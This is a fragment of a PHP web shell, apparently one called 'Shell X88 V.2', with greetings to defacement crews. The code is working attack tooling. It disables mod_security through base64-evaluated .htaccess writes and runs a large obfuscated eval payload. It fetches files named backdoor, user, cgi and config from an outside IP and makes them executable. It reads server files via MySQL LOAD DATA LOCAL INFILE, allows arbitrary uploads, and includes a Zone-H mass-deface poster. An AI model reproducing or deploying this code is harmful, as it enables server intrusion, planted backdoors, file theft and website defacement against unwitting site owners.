<p class="style4">[ GreeTz T0 : AL.MaX HaCkEr - Hmei7 - Dr.Zer0 - Dr.S4d Hacker - Al3bar Hacker- kamtiez - King OF Control - MDMN EX-SHeLL - Anonymous - Lulzsec - GHT ]
</p></center>
';
break;
case 'htaphp':
if($act=="htacss")
echo "
";
switch ($hat){
case Forbidden:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "Forbidden done";
break;
case Temporarily:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "done";
break;
case Unavailable:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "done";
break;
case Error:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "done";
break;
case Acceptable:
$m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>";
eval(base64_decode($m));
echo "bone";
break;
case "php-4":
$j ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo
JGZwKSA7";
$s = "AddType application/x-httpd-php4 .php";
eval(base64_decode($j));
echo "done";
break;
default:
echo "<table id=\"table7\" style=\"BORDER-RIGHT: black 2px solid; BORDER-TOP: black 2px solid; BORDER-LEFT: black 2px solid; BORDER-BOTTOM: black 2px solid\" width=\"100%\" bgColor=\"#003300\" color=\"black\">
<tr>
<td width=\"50%\"a>
<div style=\"font-weight: normal; font-size: 12px; color: whitesmoke; font-family: tahoma\" align=\"left\">
<p align=\"center\"><b><font face=\"sans ms\" size=\"3\">
<a href=\"?p=htaphp&?a=htaccess&hat=Forbidden\">Forbidden</a> - <a href=\"?p=htaphp&?a=htaccess&hat=Temporarily\">Service Temporarily </a>-
<a href=\"?p=htaphp&?a=htaccess&hat=Unavailable\"> Unavailable </a>- <a href=\"?p=htaphp&?a=htaccess&hat=Error\">Internal Server Error </a>-<a style=\"color: #dadada; text-decoration: none; font-family: tahoma; font-size: 13px\" href=\"?a=CMD\">
</a></font><font style=\"font-size: 13px\" color=\"#DADADA\"><a href=\"?p=htaphp&?a=htaccess&hat=Acceptable\"> Not
Acceptable</a></font><font face=\"sans ms\" size=\"3\"> -<a href=\"?p=htaphp&?a=htaccess&hat=php-4\"> Back version Php to 4 </a></font></b></div>
</td>
</tr>
</table>";
}
break;
case 'perl':
eval(gzinflate(str_rot13(base64_decode('FZjFroZgmoRicmnTHRa4cqSD/Lg7eSa4u2b1Zm1WAnzhlapt+Nf//ve//qO80uEf9ddB1ZAe5T+yZy8J7P+KMp+L8h//KSSLxM9eLPghii0j+cRcjnhWhiuvc3dv/fLjBHQnxfwcGr0uZ3etAAVOnAB1QxCrFIRS+gs6hAhVqkKDzA5s8IuveGALEBQMPV2myk20uXxmxAbRqNeIJ5Zr0XyWsHEnRxYOhmOc7jOLbfeLdkHyoUjlnqt65YoVvxGdeY9Vkxp0bb+YRsR14gQLRVkdLnIORVU5CrppWyrHHneUC+2PKHV7LVsSGksdSYouLiklsl/97rC7LiD8KxKx5f3qLNHsjAJHf0jQVvdvkuK7Kg9inL9eff2CArdd7cAl83XAj/DEa8Bxl6tUfVfCpmrgsl4v1kh1fcgEagCLyPJvxbjEaD9CUp3JZQhDMr0sC5cLNo3FIA1+j0ZMmiFImwgbe8apQVhofJGSvJBFfpiiRU4KuU4lWo4NPJA07oaUIRluJor5xXk5I4icIyU/g/2KFKwGToduW0kVxYpCiCLQvLFCJUWq5SYJvl38trzOSsBZPcTPoBHj6yvbD+vT67tqhSoWJrgzqfYFb50NuGYFy78alS8oXH2UVnK6N4pdqL66zApq/cLTRup9riiPuRKXXBfSnsP2aYglIhnJB82I6qKCTUF7pLafX4J6tuVp8ONMOtHiyipAiCwEtJd+6Z2SWBFozm8giXmUgJJic0xHuSyHeRcRcebBI/bNZ/a16PvL88VOYEbw2yemiZmAFZbHYYffgnEp6etM5NlCO/jrXT0LwZdZllYPBD8eWbqKlIskN1ZUTi9CU0RdiAIyHX43H2WgLp/dYn7M9AY75VRoR24z2D5XRP7RAkRT8CYbDbZWWIfhDN6PvKbeni39pRdQXGufWi+SlRvWv/Zcq4yioBDc4K5T1VS6yxioU26tOj7achYM6KadqnkHYiPuGUTCXOzVRK87SYvSCwYSAj3vNBmkEey9lAiGZndks9iUhuYLD0Goqh56k8Q8sH2hzmWeFIr2QCsjORXtjuue2kMzrWr645Gzhkjc7cgRWy/HkDWpkf1rMqqh6/0SRIe+ms8JuG5WdG1vy9XnAQnx9ACVcDxA7qZtNZ5nXYAfXRckzu3cCzkX212GuOkN3VctQfDu5S76tyz3TVj99aRPfeeoaYf1Gd0oy1b8E8X8RWSH806AUHy//v7E8SLpKoA65HTlBWNr0eya3SLUfJSzpVcv6T2oDDXlXguSgzmvpGAk/HiCJ39TX4F67BhIqoYgnhyodJ5NRCAmPy02TlPOWQDATPni2rjWa5kmXj5sCyk6SthMqQeZUpsQKTZATboKwTusAqkA4nTjhWkRzsrm67kLKTIemrsEpjkSVRu260FRCg+eh8z2FQD5Y3wYCrduyCvVNtF6QFhL5DS347ltX/gpJxof+C+apDfZYdVSf0aQY4W7hQw88T7JYS+Abk2oUUx8ptuX2rzUcJZFySqq/Xx88Sb3UyRfiNjPw+Caqmui91JuNC/CjThWw7E/JYChNaMg6FuCw0EVXFkf8t16umA8/wBIRMZ1BOGRsAkfvVGmiXtB2d/Nfv9SqLs1u/LXeetx52AZLtiv00qv4HfgA3alZxQyF9BqjG9VSps9n/VGF2KT49gXekGU+y+QoGxCgY0banTYhF/d7j914i2yKw9taLq0VxkyUuCUGjS8OgVrefEijW93P6mnxQOjr9+909ahfBzf0bI+hte+VbOSmvpK/RkKjNzsVXvMCwRM/ivSYM6PwhehlBjy9clZc+w4ozmnXCFBFrVYsSqbzWInf/G3K7Ieu3sckSjTyDJ/8+eAZl+p/fJSC/YpfUno0EvvNrec/HJ2YvU3yBUOWo42kRrw0gqe14sS5wYe9TEfG/OQM3ZV39Log9dneNa5KMy5Eu2atbPUS1bnTAAh94i5MHKRVdjPC2SxU6JoSSC7buyCSXutaEF5TLJNvIXuasREm4hdaGdf9NfxbDPb94T/9rpNEt2x4Y7u7eT3yTn5WFIJJENEKwZ7A92yq0cxPY6ILFETkecXPilBI/xgNtp+yLxLouoTHnVxmEUagCDCYqFGS2IjdrYEEhMMDqi4oN9srl91IOtHq5YAEcrzyKXjSktsOan36+xapm0ABJvi305ptVAI+xn28Y6js8hpYpdh2yr9i6PEpwKYhbhHTubIHECE/oARoulx489tMx4FdnEX1eaUicrUeSp99f5H/Mm4ikZyT4RbZxeUPzEBlDS1w7O7+/rGCrU3h/bKTL6No5eU2BZb9lX8sw5lXS0rntCgthuKB9/hC+Pjz24JcmRYiyVsJsJ8d42kUA3Lvzygve35m1NEsebA/jvH+hi2pWJNnhg9JTlKNKNbhLgBQegDCKkgxWs4C4M8I0w/WleMunDnjqxIln5d4Ko/SOzRuZ7peKY2Pf8GlwWEwiiXuD08b3XbVxi6XS1/wTxIjgcKzBYow9MUGVJn0QfpgsvM4WjXH3xrj1sMtAjDK67ZDgu7xoAKgyBRQ7YL+lLBD/OE6ewub8mQtk8CNsY5NdGt6o30ll8DfklQl3kn30JwNlpXS/cx4ZFMZxmLQ+VABHqgm1PSL9yeZRzDgKgbhy8pCkK07/zdQ9vSA0dieKgYWhZw7tiCthf39BXLEGVNEHw1VrN6cHLj1X2si7t0lu2Rr2stdli0il+XXM1zx1j2ddpLU+YuyngCLU5/xUwsGqBAtKhQhvEwe6Toj3bMBkn3WX1iT9fXElWwLeXPtTXS1rXwRmAM006us5/YskvgUhr7Xd2/i8pvBZDBVa9ufSb4iidgSEJDP9LSEg+qzWgIJaS481R/oHqLCnOyq5MKUCf79eCO41poHffo6Qho3mwi5pdZBaKlyVsneA2StrwBETzB7STn5IDRqwosoqlUtLJckaAQG2pJmbNRU/WaIcctESvVrN/5kEAnTASfRNFfN6eaNVwDKvY8i+z3I0/2k2Xifua/unrJ9eev8quE7K6SlfIBm/4njJ9yhsmEGUYQ0GVqezla5fJObm45/owtCXcUO7AX9HP/mN8hKutxQQs65QdZSvazt9y4PKSroFpWA08fhTHYrUM51hAPQg338U640E4oNtnjUbbZsepKK5GgcQhq5kgTf4WI/Iv5EWsjbqdsD+J3mYLiRY8HZc+IhLfKoeODApDpNtA8f/tNuuboEr6ENH+xaEaBDDMDe+jjDK84Q5jrR97a5xU/afBpK2PG4MoVXPn7bb9ePhaWgUfF8M81rDq42OTF6vpTj8ap84LtK44CsOZxwXyQxQldFr1rF9aijEqkLUGvxPdzzPev8uqB1kw2KYi9VIeN/c14pGUHvNmv5RJKwlJ4AMjsJXAlj6WW7j8aW377MVCAaiBe5IJDCTumjF+FtjzVerfqVnQ0600G9Wtk6qYfsMKd3CrySgXoF13l3JdHJNWCSRw7QcrpSRZAfyfF9fXYuLzKG7LGra8OrkgZ25fIdMtgw2eeQUZSezQRXjUuOIKirK3phk/YAZY1p5iPds8ya77oCJaT4i3q3JF/fKVnDa50Kw79yW5XxyLk65X3lcqfEve0DjDtVdcwj86TMU4SwziJX5VX2RS13lAzN0cQCoCZYwKSWQCU2E39lV6S/RsSdxI2WJFqwHaN0PAXTLGaMVpPFxXtt84bhgUGk1Db1wx/90//0dexuUpfUqN/q8/PEUCVpKzSRpxB68MKUJpwRXWCDz20AyhcAWxG/Lm1I3GIYzRuCC1/lZgCxydfW4g//RPR7McmOWdWFDM2QSTsLOOfHwS2XclvhQzoiPvRgk3UBMfYNLuq2FY8yHcVYSEtjjobSZPIkW+sw2ntY/5Zf5+NgF2HBHG16JJ7CPk7g/iU/RTa227gtS2MRyl4eYemtqWF1gSFYW1xe5YDIc1GDo/JNiTtYokkd84Ri6w7SvmzoLHqbVoQcfLxl+3HEP4+coJ+AsXb6BzAh+f3xKpvkuwEIQrb/7F572LoxQ1K+ZgIg9H03TV/ip58OHZ7O8d2NvHXdTySwp1PSr84OhEVbM56FbXvcTcjVOu0I2Yu/klK0G6ktm/5L62r++TwuPZ6w+TMH+ETyUA6ciqXvx/33Je/nFhqsvUB7YcNi7zXg/BkMStbHBwOsl5NPAdGgmovTkIChovrpfAGNYuLcarAIWBFEAdlDjD/RNUZtvsjKsFiTHQAynrS2qIh/Z1KuIEra5OAiZNJo/tLYKpXwWQOTpXn0zECOK1lpGYzLDDlnXlfmVAszUGShGjw5TxNIv/qTLNbjjVQ0OtxlneDg351tM5QciHpBJKNjQhxhKuoMifc4FfbXRDcDpiFa3SmSjZmVB+ifsB4ZAFhpMqFb+eNWmtQXwbx4ZI0gomDqP8dt31qevaSkAUbJSQnvUAS8F8Gg3ajHhlQ9F61XxGB8Beo2QmWKEBzbuPHP8RzYM4U4oJh1xRYz0FZmJnH/c1Xpk/pV0d8PbzI5ej1uT/PAd2hh7FP1lbj86N+I2sR98aXhNSZM3uva1GHgC5XBBiyvix3om7AgKXGRzs15gkAkEU8Vw6Zq8SDwxVOik0deSGdETUo74iLZC2TqfcLzaTN8CTtgBTNIjfuFxwPhWWGcScDIceJPzj60B9fnYzlfjhFZ/eWoqz1F7Un9g3T9JWFAW8iqneL3loU/Y8RCP4Rzal55bxFn79KDGvHASdoPS/5vOMUzyb781x397J0nnDzTmBalpI1tICBAFvvjUkYQwqxPWeKmnsqBAjnuJ3TQZS0fKKRvBKLcqH639LTdO8P85LS66ci28L8/JlWOv3UGedfVq/XbqWoNR5sZ8JPeE+ZnJWWiSijsPNod/OKyUwla9buW/5sz6EJRmJYFQaQjz2Y6rartC9ph/wZfrieiZm/VeQP/AuBXNiDzobxQw6uHd0YwGdSB9usKiFS6s4NyYkaWD8ho4BTJyiSunjJxVxhT8qgDeD/5EU5kk87pKLMs5/98+2HDI5aBTOCxMF2CzRkZY2TNx/n7FmPDgvc0kPhfITKsvLQGv7MX+CqX8n70mLrc9BRrW/7Qw9Ix/Et6arDiczi8l5jzo9Q6y6VWblE9qzkUULVUEtxD5IrSxSl//KKsdc6TR0k2SdaSx+tJOo+UmbxLYG1jqk4EOx7ny2KNbXXD3/8vpz266/hOtS0GUn71C9RgsMySPX6ewpqvTDXKVrJnqLT3wSg259gccbFLcdEX6pNqMHI64DV7OuflTzuto9xTaSMBcNg/XFyU+L/5pF5UjscYfAUn/wySD2GkU/v4nCltphKhqCG6wlT39sx/f646kqCnCkXmSKXfMsLfoKw+2R4NVhgwfixp9CBK+Dk9S1xL1TEza7l8kW97hKxbcyUf07wJ3kXOBMY8GkhA9haqsIT67R4qnSpjiX5UZZeo4teaYNs97h2Vd5d1TTJdEUrWIwrw/2UIr7XqRTupb4fx9ZyYH0scDTYFrQu9EaIvwmhA96c9EZa+ZLvagFFrzUTvFNgtEKTP4yMufdcdfupJGwN2UAsdgYEbOg0APM9VO+1iBgvGIvmNRF/4J9v8h0knXhX2xxFhRGlGDA2Brt6NEVEhZ6T++j3lOyf6cKgrCflszhFe7zG0Wf4A7pgr5m7fPxBkWyQq7+UjrvWLUtXjAuB+rgMcToyR5wu5BJ5yOcXgt7xUl6Q1vPCtDrbsDoNB+R4j1QPOMXz2GMZbOlEQeMMjTLj7mZu6p0d2MFpmOSGv4Tjiu7YdwqxcE23ro7quHcg4uWob4YRjNDf1N2+ZlHDPbgWftjkmboNnGoGLv1THjLvBjmr7oT7P/ke5gpMnu4jSYOLPY5L71yFZXwS0Tu2NwipqtZxkYo1DIbDXiDqQrPRl3Q7ZeDYxLYU/zgt/cOQlBX1WH9/qJjIPcCh0GEP9dL80CvlvmrYQP15u6DdycrhKYoINc4kYVx95DRB4wPRL5Ytl95+lMygpQOPzlO7GPhCM/VI2arDg3ykRvQOX4ZcyyWaCRYPmwAychND3rUz8E5ShKIz6BklHuQ6mtKNCoYnNcrO57oYJrRemdmZEFuVMicI5Ql/3D/qqH7+bLaTLtHpq0uOxoIx8LnxXzHZFDng3sxn1EeU4PM/dabdDLhSjg+ez7VZnxFGfhnBLaXsIb+v04o8Hv53bnZRJyLN1QAhJFw4CHb36bEzTQ9lHjM16eePiPToDg6/EetR9JkdE2n+kEl0NJ1/I5pGkZLK7y4L2ML9ljc8iuwJoMN59+7BMLC4sskrMSBgquaXB1msySwNGy68mlnCPat/IhbQIwBJI/avcxjN4K0E9CtwmVRZCeVcoa+d67duTkomR8WkU+aaKodBKoajmn6n1+xLeMBT/TOsLUdWr2Vk3zJLj53o6zKtkgQtvZAmNzq20DFdXOjGy9tdkNiUn+g4wcRS984zCRUV8/l2hRjN20AuhXoIJfP1veLF6PhGwr+JWAMCwQyvN6nMOMLZZpYOXe2fCZ0BB1llz7JVGgKSjc1/qTzwt4+JbtDaKs9p8HiOM3o3i998yYjrPCZ/aiMMAi8qBqcY298MSad/g4VB8o+iRXI43eqh0Ct2pC7zNYpbQt8DkGR0QmP/16zBsO4MZwJPxPsRQZ2FjFY6gq8ozErGdTo2JeHWQ1GNxq5zvjcItli/yukRQ2af39Zy7/csPz0ojA86g2ylR3JFx/Sc6wpWQRj4Dz9C6gOSEuOPBC1KCMV15mMwPqaNJ2wbcpwyi0v3iQ/49sWNYUOz4o9f2/FpN81bg6M4IvOFKmF/KPVmlonbYgSj6L7eV3i7n5hkVQsPvKeGBMT0qOSp8D1xXPsLzwjSBN7qtlD3enLglO4AnrOA/pCqGcO2BvcYSqdukQw7eSYgWKLdQuxhkdnAFbS+Eb6wXXLq5ziCU8/TfYqWInUVkNuYVEdM0sKDJEjmWwlo1DZr/utlZGbrvmYZqJROUH17rM44I7Yz1zqUqNw+BJ82ih3ytcWWv+nYtgyZ8ewP1GCdjYp7VFL3DH76Zu1C5l88ZEZIMT3Qlx80A07QmrZnVfnVxYWQnPOGWm89ooRSG1OibS88WFEHrXy9PyATqdN5UuSWcRPGfFNdGenXj5HBdY8VcIk0AagAq+s3thAtYvhsfzGROcrGhrqW7ROqIoE7V9x4zrUGc3F6GA1nVSO/pFyB5MZ//0SZfs3a368c4lQ3gaXkk793hCka+qTd6zmjaWCq/47hWljbBiRcOrJEHLpGXFzj3v3VRzXmPGQU2UzYf0IA7UYDvTfypsRtI+LC3aGqmDsX3jr1L9s8oyer6/MI5xfGFbHOOBxpDUOyLX0dADLKF4oo5On93VZbOuZSyvAG/jzGRQoNeanCIsHVRHyj4Bi1jnckqh4vEIo4EhZq3N0yR5UU+Dx/RqWBw9wDSrcyMjpLCMCfUbwgdMD21vg9L4uv1BW5f7wNNMCurkPi90BjVqgIfaCdM1OR73nnnik1XjVcN+3oJLTpY8CM6knwUEk4jm5pB4m0OKbS12vFtvPXCB4nsvDSsD66gH639Qf7rdEHo3dYeDtSDVm7PBgQaevL+gs9BC9TEGfNHtWhaSC15SBP8Aukir81Khs8f2fpquNF7JDHN6SaaccLvmORJufXcf0S09gnvnYdCSQAvvxMX1nyLmuFRYi6/nkmnfPrx6JoUTjB2vBhpA+Eht2wNH90lf7ImQyATGIGAVd+Y8MN8oC3rwFgSJVi+EvROupXrfFgxMXX3bDoBpywONe2eEicXxm1ubBKl6J228J/xKZekD5KF/S2g912O09S2pcpE1td5BEYtts0rArAYGSbJaz5JOHLPSfKQD1h7jlAvS38giLPbF2fQAUX5daty85O4y53jZgKWsKm4+a1VZK1eKl20AEaRVBkY49rfnpDA5Ru0oMhRJONbsGDeIwW9hgAfMgjSgveh7ddzCgZ+nWeFMsURdRw/SLiYvw6rixgcEIYCvhrw0VQzl6F3Gj+wPAcrwzLhgnOCaXPiLNMuha/y0tLz3bD0WKtwC7ArVs/tshNdjeoPeKPeIC1MGnM/JPp6RmyRC6YXcUnu4qWGUxEzK3lFcqfkQPj+1240v6MRCHko/DfKKz2Q7mzwuj+FlifHQY6MxiI/3lJBaocnjENvRLQFiK76p1ppKLGkkgFKdRmp04XsUEfHe/WiN4nKvHBP/724q+bM4l6JtKdiMRqsfIoP132PQMvJJQTv8FV4pzLhL9n3OIvt8Nt96dVdIG1vfUdP5876l96RJD7xMmbO0/stRb2BzygRlhJsVjAH36CZw4j83ODQqxZD4fSTG7rhY7VAslgvUqtUKIhZAMH3xOS7w8ilLIFhM876+WuatZpTh69u/jN2tIwMIddeDSCeMTTOneA06kyE6xamh+8oO3CPkOLZEV9B9ZrV9ZWDdfMuS/3OrPM/STXEZH5mm4RJvE/RJloEswsyjV20502w6V5QAyZviyTmctPf/CXwA/bVmYrdsOF1fY2/dkXZmEJwUeAnG5I07TnZX0YICOx2efW0T1wHhOgWVg9MUCWzFN3gklI4r4/MTCUCYyTTGq6p9O+TayrAv51XDFpToaz4zNjcS2BMfPeArUCBiT3YfIo7Y8QwEKlhijp1TCr5Qpp8fFHJS46nZOrSaBrhPjAdvE4ICzY1I/8NaIiybPvN8GfApBDwY1uqgnXzI/autoJ+XDA5clWbZWRjRRm10Ce+bYVuSCDOLlN+1viK0eH8aweJsQ4nlP1u20Sl/EzYlGw+EscsNQI7deBx56nfG4JZorNEdcc/HhU9Ag/nkw1qIkIjU9vFOC360ttTpfhYu2O2ogIELYonlNiF2UknOr+ghmLNLgCtUAxvdw7OYUEQVZRj/qG6jiSQPKxpHf4IUBUT+rp6C8OyBRkRZRVQFeUdSRMbEDTGHY/MSNNt0CmxBTmIuLAlRZNOY/6hnwUbVQ9R/w5x2RTXq7inb3Spe2wZ3F9xjgr0OCJCNMQEVYcmQZWc365RDgsgUZklEAlRJE5rQMQes8vUT34l7U+B9/OgZriTqTA7w/KW/7PtBk27lactqY317h3ztTacqaWAQNxzxv0Xu1juBA8zNEjH8YqlQ+1SSieZul3OX0zM6aNk35CxowyCxinpQWdP2Aqoylo4ouvhZx6Ok713+z85UFTlUordSGRZq2Gaddl9FQONRZUYWHFZtbk0L/f6zf9iHIhCjjf00h/ToQU1Wx7tbPlX/1BSU/volBgiR7twRujRbm+lAatjEWM5wlIDSV6WgmLyna6vz8cIu8em0Qh/OuFbBky6slFeoIgaPEM0kxgY67R3xVSgSD4UhZVAh9Zg+Ba/c9//vOf//yv//jX//73v/4f'))));
break;
case 'addt':
$file = fopen(".htaccess" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/htaccess.txt');
$write = fwrite ($file ,$sa);
$file = fopen("user.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/user.txt');
$write = fwrite ($file ,$sa);
$file = fopen("cgi.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/cgi.txt');
$write = fwrite ($file ,$sa);
$file = fopen("jeentel" ,"w+");
$sa=file_get_contents('http://lojapontoc.com/loja/ext/jeentel');
$write = fwrite ($file ,$sa);
$file = fopen("1.txt" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/1.txt');
$write = fwrite ($file ,$sa);
$file = fopen("backdoor.txt" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/backdoor.txt');
$write = fwrite ($file ,$sa);
$file = fopen("dz.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/dz.txt');
$write = fwrite ($file ,$sa);
$file = fopen("config.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/config.txt');
$write = fwrite ($file ,$sa);
fclose($file);
if ($write) {
echo "The File Was Created Successfuly - Tools Hack In Shell X88 V.2";
}
else {echo"\"error\"";}
chmod("user.dz" , 0755);
chmod("user.dz" , 0755);
chmod("jeentel" , 0755);
chmod("dz.dz" , 0755);
chmod("config.dz" , 0755);
break;
case 'zone';
ob_start();
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){
die('Curl eklentisi Y??kl?? degil Bu serverde ?al???maz L??tfen server Y?neticisi ile irtibata geciniz');
}
// sar? sar? ?rdekler ucusuyorrrrrr...
?>
<title>SubZ3rr0 Zone-H Mass Deface Poster</title>
<style type="text/css">
.style1 {
text-align: center;
}
.style2 {
font-weight: bold;
}
.style3 {
font-size: large;
color: #FF0000;
}
div#option {
background:#000000;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;
}
</style>
</head>
<?php
if($_POST) {
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
// bosmu dolumu
if ($hacker == "") {
die ("<center>Kim Deface Ettiyse Onun Ad?n? Yaz?n?z<center>");
}
elseif($method == "--------SELECT--------") {
die("<center>Method Bildirmek Zorundas?n?z</center>");
}
elseif($neden == "--------SELECT--------") {
die("<center>Bir Neden Bildirmek Zorundas?n?z</center>");
}
elseif($site == "") {
die("<center>L??tfen Hacklediginiz Siteleri Yaz?n?z</center>");
}
$i = 0;
$sites = explode("
", $site);
while($i < count($sites)) {
if(substr($sites[$i], 0, 4) != "http") {
$sites[$i] = "http://".$sites[$i];
}
poster("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
++$i;
}
echo "<center><p>Hacklediginiz Siteler Zone-h 'e Postlanm?st?r</p></center>";
}else{
echo '<center>
<img src="http://www.shy22.com/upfiles/izE53172.gif"></img>
<form action="" method="post">
<div id="option">
<p>Defacer<br />
<span class="ok"><input type="text" name="defacer" size="40" /></span> </p>
<p>Y?ntem <br /><select name="hackmode">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option
value="2" >undisclosed (new) vulnerability</option>
<option
value="3" >configuration / admin. mistake</option>
<option
value="4" >brute force attack</option>
<option
value="5" >social engineering</option>
<option
value="6" >Web Server intrusion</option>
<option
value="7" >Web Server external module intrusion</option>
<option
value="8" >Mail Server intrusion</option>
<option
value="9" >FTP Server intrusion</option>
<option
value="10" >SSH Server intrusion</option>
<option
value="11" >Telnet Server intrusion</option>
<option
value="12" >RPC Server intrusion</option>
<option
value="13" >Shares misconfiguration</option>
<option
value="14" >Other Server intrusion</option>
<option
value="15" >SQL Injection</option>
<option
value="16" >URL Poisoning</option>
<option
value="17" >File Inclusion</option>
<option
value="18" >Other Web Application bug</option>
<option
value="19" >Remote administrative panel access through bruteforcing</option>
<option
value="20" >Remote administrative panel access through password guessing</option>
<option
value="21" >Remote administrative panel access through social engineering</option>
<option
value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
<option
value="23" >Access credentials through Man In the Middle attack</option>
<option
value="24" >Remote service password guessing</option>
<option
value="25" >Remote service password bruteforce</option>
<option
value="26" >Rerouting after attacking the Firewall</option>
<option
value="27" >Rerouting after attacking the Router</option>
<option
value="28" >DNS attack through social engineering</option>
<option
value="29" >DNS attack through cache poisoning</option>
<option
value="30" >Not available</option>
</select></p>
<p> Neden Hackledin ? <br /><select name="reason">
<option >--------SELECT--------</option>
<option
value="1" >Heh...just for fun!</option>
<option
value="2" >Revenge against that website</option>
<option
value="3" >Political reasons</option>
<option
value="4" >As a challenge</option>
<option
value="5" >I just want to be the best defacer</option>
<option
value="6" >Patriotism</option>
<option
value="7" >Not available</option>
</select> </p>
<p>Siteler <br />
<span class="fur">Siteleri Alt Alta Gelecek ??ekilde Yaz?n?z</span><br />
<span class=""><textarea name="domain" cols="43" rows="17"></textarea></span> </p>
<p><input type="submit" value="G?nder Gitsin :)" />
</form>
<div class ="sub">kodlayan SubZ3rr0 </div>
<br>
</div>
</center>';
}
function poster($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=".$site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
break;
case 'readbysql':
echo '<form method="post" dir="ltr">
<table border="0" cellspacing="1" width="109" dir="ltr">
<tr>
<td width="312" dir="ltr"><span style="font-size: 9pt">
<font face="Comic Sans MS"><font color="#FFFFFF">DataBase : </font>
<font color="#FFFFFF" face="Tahoma"> <input type="text" name="dbname" size="20"></font><font color="#FFFFFF">
</font></font>
</span></td>
<td width="245" dir="ltr"><span style="font-size: 9pt">
<font face="Comic Sans MS" color="#FFFFFF">Username :<br>
</font><font color="#FFFFFF" face="Comic Sans MS">
<input type="text" name="dbuser" size="20"></font></span></td>
<td width="117" dir="ltr"><span style="font-size: 9pt">
<font color="#FFFFFF" face="Comic Sans MS">Password :</font><font face="Tahoma"><input type="text" name="dbpass" size="20"></font></span></td>
</tr>
<tr>
<td width="558" valign="middle" colspan="2" dir="ltr">
<p align="left" dir="ltr"><span style="font-size: 9pt">
<font face="Comic Sans MS" color="#FFFFFF">Dir :</font><font face="Tahoma">
<input type="text" name="path1" size="28" value=""></font></span></td>
<td width="117" valign="middle" dir="ltr">
<font face="Tahoma"><span style="font-size: 9pt">
<input type="submit" value="Read" name="exec"></span></font></td><center>
</tr>
<td width="670" valign="middle" colspan="3" dir="ltr" height="105">
<textarea rows="17" name="result" cols="54">';
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1']))
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " . $dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result);
while($row = mysql_fetch_array($result)) {
echo $row[fileview] ;
}
}
}
echo'</textarea></td></tr></table>';
break;
case 'upload':
echo '</pre></form>';
if (isset($_POST['upload'])) { $savefile = getcwd()."/" . $_FILES['file']['name']['0']; move_uploaded_file($_FILES['file']['tmp_name']['0'], $savefile); $filesizename = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB"); $size = round($_FILES['file']['size']['0']/pow(1024, ($i = floor(log($_FILES['file']['size']['0'], 1024)))), 2) . $filesizename[$i];print "<b>Uploaded be completed !</b><br>Details:<br>Filename: <b>" . $_FILES['file']['name']['0'] . "</b>.<br>Size: <b>" . $size . "</b>.";}
echo '<br><u><b>Upload Files:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="file" name="file[]" size="50"><br><input type="submit" value="Upload File !" name="upload"></form><hr><br>';
